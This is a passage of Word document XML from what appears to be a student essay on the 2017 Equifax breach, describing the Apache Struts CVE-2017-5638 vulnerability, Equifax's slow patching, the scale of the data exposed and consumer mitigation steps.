      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">an exploit allows remote attackers to execute arbitrary commands </w:t>
      </w:r>
      <w:r w:rsidR="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to abuse the Strut’s parser </w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">via a </w:t>
      </w:r>
      <w:r w:rsidR="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>created message where the header contains</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>= string.</w:t>
      </w:r>
      <w:r w:rsidR="004F28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746D36EE" w14:textId="2EEA3601" w:rsidR="00EA4394" w:rsidRDefault="00EA4394" w:rsidP="00EA4394">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">At the time </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cisco's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Talos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> security division </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">warned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">that, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"It is likely that the exploitation will continue in a wide scale since it is relatively trivial to exploit and there are clearly systems </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>that are potentially vulnerable.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r w:rsidR="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Detailing that the exploit itself was adamantly difficult to easily patch due to the widespread nature of the </w:t>
      </w:r>
      <w:r w:rsidR="000E4CC2" w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Jakarta Multipart </w:t>
      </w:r>
      <w:r w:rsidR="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>parser</w:t>
      </w:r>
      <w:r w:rsidR="00566573">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> used in this exploit which coincidently applies to several Java Oracle devices. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063157C5" w14:textId="5C4B6D56" w:rsidR="0008424C" w:rsidRDefault="004F28D1" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVSS scores,</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided in Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, detail the report at the highest possible critical value. Known exploits, (unless listed as false-positives), going unsolved for a </w:t>
      </w:r>
      <w:r w:rsidR="00416C2F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>seven-month</w:t>
      </w:r>
      <w:r w:rsidR="0030178C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> period </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>allowed for this controversy to cause a great uproar in the cybersecurity community.</w:t>
      </w:r>
      <w:r w:rsidR="0030178C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Considering the information of the victims being at such a high target mixed with the even higher target of the company itself, </w:t>
      </w:r>
      <w:r w:rsidR="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the uproar is understandable.</w:t>
      </w:r>
      <w:r w:rsidR="00566573">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerability scans performed by Equifax were reportedly observed on July 29</w:t>
      </w:r>
      <w:r w:rsidR="00566573" w:rsidRPr="00566573">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00566573">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, five months after the official release of the vulnerability itself.</w:t>
      </w:r>
      <w:r w:rsidR="006B474D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AE575B" w14:textId="295D2BA9" w:rsidR="006B474D" w:rsidRDefault="006B474D" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The first steps in company mitigation should have been for scanning for vulnerabilities themselves. A five-month period spanning between vulnerability release and observation leads to believe that Equifax was in dire need of VM distribution over the manager admin interface. After observation, the proper steps could have been taken to resolve the critical vulnerability</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3E7EFBF9" w14:textId="28FDCF93" w:rsidR="00F94351" w:rsidRDefault="00F94351" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This attack impacted approximately 145.5 million U.S. consumers along with several million Canadian and British residents. </w:t>
      </w:r>
      <w:r w:rsidR="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>he Equifax breach</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the first</w:t>
      </w:r>
      <w:r w:rsidR="0008424C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of its kind that</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0008424C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>leaked</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">name, address, birth </w:t>
      </w:r>
      <w:r w:rsidR="0008424C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">date, and Social Security number of several million </w:t>
      </w:r>
      <w:r w:rsidR="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sent to the deep web </w:t>
      </w:r>
      <w:r w:rsidR="0008424C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>all at once</w:t>
      </w:r>
      <w:r w:rsidR="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0008424C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>It</w:t>
      </w:r>
      <w:r w:rsidR="0008424C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is considered one of the worst data breaches in internet history.</w:t>
      </w:r>
      <w:r w:rsidR="00E36FC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Not only is the information vital to a user’s everyday living and financials, so many users were affected that the repair process is near impossible.</w:t>
      </w:r>
      <w:r w:rsidR="0030178C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8381F0" w14:textId="1ED7F2D7" w:rsidR="00316267" w:rsidRPr="007D02A2" w:rsidRDefault="00E36FC7" w:rsidP="00416C2F">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">On the user’s end, mitigation involves freezing credit, changing home addresses, card numbers, phone numbers, and request of name change. At this point, the user would still be vulnerable to the Equifax breach and considering that the information applied to nearly a third of Americans, the only solace found can be that an individual’s identity can </w:t>
      </w:r>
      <w:r w:rsidR="000E4CC2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D8BD222" wp14:editId="5C018074">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3009900</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>4752975</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2924175" cy="243840"/>
                <wp:effectExtent l="0" t="0" r="9525" b="3810"/>
                <wp:wrapTight wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="20250"/>
                    <wp:lineTo x="21530" y="20250"/>
                    <wp:lineTo x="2153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24175" cy="243840"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1BF9349E" w14:textId="69F58CDD" w:rsidR="000E4CC2" w:rsidRPr="000E4CC2" w:rsidRDefault="000E4CC2" w:rsidP="000E4CC2">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:i w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="000E4CC2">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:b/>
                                <w:i w:val="0"/>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Figure </w:t>
                            </w:r>
                            <w:r w:rsidRPr="000E4CC2">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:b/>
                                <w:i w:val="0"/>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r w:rsidRPr="000E4CC2">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:b/>
                                <w:i w:val="0"/>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
                            </w:r>
                            <w:r w:rsidRPr="000E4CC2">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:b/>
                                <w:i w:val="0"/>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r w:rsidRPr="000E4CC2">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:b/>
                                <w:i w:val="0"/>
                                <w:noProof/>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:t>3</w:t>
                            </w:r>
                            <w:r w:rsidRPr="000E4CC2">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:b/>
                                <w:i w:val="0"/>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r w:rsidRPr="000E4CC2">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:i w:val="0"/>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> CVSS v3.0 Impact report concerning CVE-2017-5638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BD222" id="Text Box 7" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:237pt;margin-top:374.25pt;width:230.25pt;height:19.2pt;z-index:-2516469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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1BF9349E" w14:textId="69F58CDD" w:rsidR="000E4CC2" w:rsidRPr="000E4CC2" w:rsidRDefault="000E4CC2" w:rsidP="000E4CC2">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:i w:val="0"/>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="000E4CC2">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Figure </w:t>
                      </w:r>
                      <w:r w:rsidRPr="000E4CC2">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r w:rsidRPr="000E4CC2">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
                      </w:r>
                      <w:r w:rsidRPr="000E4CC2">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidRPr="000E4CC2">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:i w:val="0"/>
                          <w:noProof/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>3</w:t>
                      </w:r>
                      <w:r w:rsidRPr="000E4CC2">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r w:rsidRPr="000E4CC2">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> CVSS v3.0 Impact report concerning CVE-2017-5638</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="tight" anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00416C2F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78C5ACF0" wp14:editId="6F674292">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1247775</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2924175" cy="3451225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21461"/>
                <wp:lineTo x="21530" y="21461"/>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801"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2924175" cy="345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hide amongst the crowd. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36791302" w14:textId="310C23DE" w:rsidR="00316267" w:rsidRPr="007D02A2" w:rsidRDefault="00316267" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If you have a credit report, there’s a good chance that you’re one of the 143 million American consumers</w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>whose sensitive personal information was exposed in a data breach at Equifax, one of the nation’s three major credit reporting agencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C43AF2" w14:textId="2CDF2A28" w:rsidR="00316267" w:rsidRPr="007D02A2" w:rsidRDefault="00316267" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The breach lasted from mid-May through July. The hackers accessed people’s names, Social Security numbers, birth dates, addresses and, in some instances, driver’s license numbers. They also stole credit card numbers for about 209,000 people and dispute documents with personal identifying information for about 182,000 people. And they grabbed personal information of people in the UK and Canada too.</w:t>
      </w:r>
    </w:p>
